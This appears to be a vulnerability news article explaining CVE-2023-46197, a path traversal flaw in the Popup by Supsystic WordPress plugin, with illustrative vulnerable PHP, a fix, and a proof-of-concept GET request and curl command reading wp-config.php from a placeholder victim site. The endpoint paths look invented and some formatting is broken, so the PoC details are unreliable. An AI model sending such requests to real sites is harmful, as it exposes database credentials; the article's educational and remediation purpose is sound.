CVE CyberSecurity Database News

CVE-2023-46197 - Path Traversal Vulnerability in Popup by Supsystic (WordPress Plugin Exploit Guide)

Poster -

---

Introduction: What is CVE-2023-46197?

CVE-2023-46197 is a serious path traversal vulnerability found in Popup by Supsystic, a WordPress plugin used to create popups on websites. The flaw happens because the plugin does not properly restrict file paths, allowing attackers to read sensitive files outside the intended directory.

Affected Versions: All versions up to and including 1.10.19

- Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory (a.k.a. 'Path Traversal')
- CWE Reference: CWE-22

What is Path Traversal?

Path traversal (directory traversal) is a vulnerability that lets an attacker read or access files that the web server shouldn't expose. This usually happens when user input is used directly in file system operations without proper validation. Attackers can use sequences like ../ to break out of a limited directory and reach sensitive files on the server.

How Does the Vulnerability Work?

The Popup by Supsystic plugin fails to restrict file paths when accessing files. If a user supplies a crafted path (for example, using "../../" to move up directories), the plugin will serve files outside of its own directory — this is classic path traversal.

Example Vulnerable Code

Here’s a simplified version inspired by how this coding mistake happens (not from the plugin’s source, as it's proprietary):

// Assume $_GET['file'] is passed from user input
$filename = $_GET['file'];
$file_path = "/wp-content/uploads/supsystic-popup/" . $filename;

if (file_exists($file_path)) {
    // Vulnerable: no sanitization
    readfile($file_path);
}

What’s wrong here?

If an attacker sends ../../../../../wp-config.php as the file parameter, the server will read and display the sensitive wp-config.php file (which contains database credentials).

Proof-of-Concept (PoC) Exploit

Suppose the site has the plugin installed and is vulnerable. An attacker would leverage a crafted GET request like this:

GET /wp-content/plugins/popup-by-supsystic/some_ajax_handler.php?file=../../../../wp-config.php

`

../../../../wp-config.php

`bash

curl "https://victim.com/wp-content/plugins/popup-by-supsystic/ajax.php?file=../../../../wp-config.php"

If you use Popup by Supsystic

1. Update plugin: Upgrade to the latest version if available and monitor the official plugin page.

How should developers fix this?

// Secure file inclusion - allow only files from a whitelist or check for '..'
$filename = basename($_GET['file']); // strips directories
$file_path = "/wp-content/uploads/supsystic-popup/" . $filename;

if (file_exists($file_path)) {
    readfile($file_path);
}

References

- CVE-2023-46197 at MITRE
- Popup by Supsystic (WordPress.org)
- Common Path Traversal Attacks (OWASP)

Conclusion

CVE-2023-46197 is a critical security issue for anyone using the Popup by Supsystic WordPress plugin. If left unpatched, it allows attackers easy access to sensitive files, leading to full site compromise. Always sanitize user inputs, keep plugins updated, and monitor for new vulnerabilities!

Timeline

Published on: 05/17/2024 09:15:09 UTC
Last modified on: 06/04/2024 17:22:14 UTC